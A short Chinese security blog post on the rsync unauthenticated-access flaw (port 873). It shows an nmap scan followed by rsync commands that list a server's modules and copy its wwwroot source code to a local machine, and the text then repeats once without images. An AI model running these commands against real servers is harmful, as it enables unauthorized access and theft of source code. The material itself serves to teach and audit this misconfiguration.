rsync未授权访问漏洞
2017-09-26 本文已影响0人
Sec小玖
端口号:873
通过nmap 扫描目标开放端口
![](https://img.haomeiwen.com/i8111956/112740cdf48b4c6b.png)
可以看到873端口开放了rsync服务
rsync ip:: //查看文件目录
![](https://img.haomeiwen.com/i8111956/a124d3a4d6cec902.jpg)
rsync ip::wwwroot //进入wwwroot目录
![](https://img.haomeiwen.com/i8111956/655d76743b1ef9f5.png)
rsync -avz ip::wwwroot/目录 /root/本机目录 //下载源码到本地
下载后进行代码审计
![](https://img.haomeiwen.com/i8111956/aa8cb05f9f71563d.png)
端口号:873
通过nmap 扫描目标开放端口
可以看到873端口开放了rsync服务
rsync ip:: //查看文件目录
rsync ip::wwwroot //进入wwwroot目录
rsync -avz ip::wwwroot/目录 /root/本机目录 //下载源码到本地
下载后进行代码审计